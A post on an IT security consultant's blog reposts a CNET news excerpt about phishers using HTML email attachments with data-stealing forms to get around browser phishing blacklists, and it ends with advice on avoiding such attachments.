Miles Associates LLC

Jim Miles – IT & IT Security Consultant – Web Sites for Growing Organizations

Tag Archives: Browser

Phishers use HTML attachments to evade browser blacklists

To get around phishing blacklists in browsers, scammers are luring people by using HTML attachments instead of URLs, a security firm is warning.

Chrome and Firefox are good at detecting phishing sites and warning Web surfers via a browser notice when they are about to visit a site that looks dangerous. So good, in fact, that scammers are resorting to a new tactic to lure victims into their traps via e-mails–attaching HTML files that are stored locally when they are opened, according to an M86 blog post yesterday.

After the user fills in a form with the information the scammers want to steal and clicks “submit,” the HTML form sends the data through a POST request to a PHP Hypertext Preprocessor script hosted on a legitimate Web server that has been compromised…

“Months-old phishing campaigns remain undetected, so it seems this tactic is quite effective,” the blog post says…

To protect against this, people should avoid opening HTML attachments if the e-mail seems suspicious and [should] not provide any information in forms. Financial institutions do not send such attachments to customers.

via CNET News.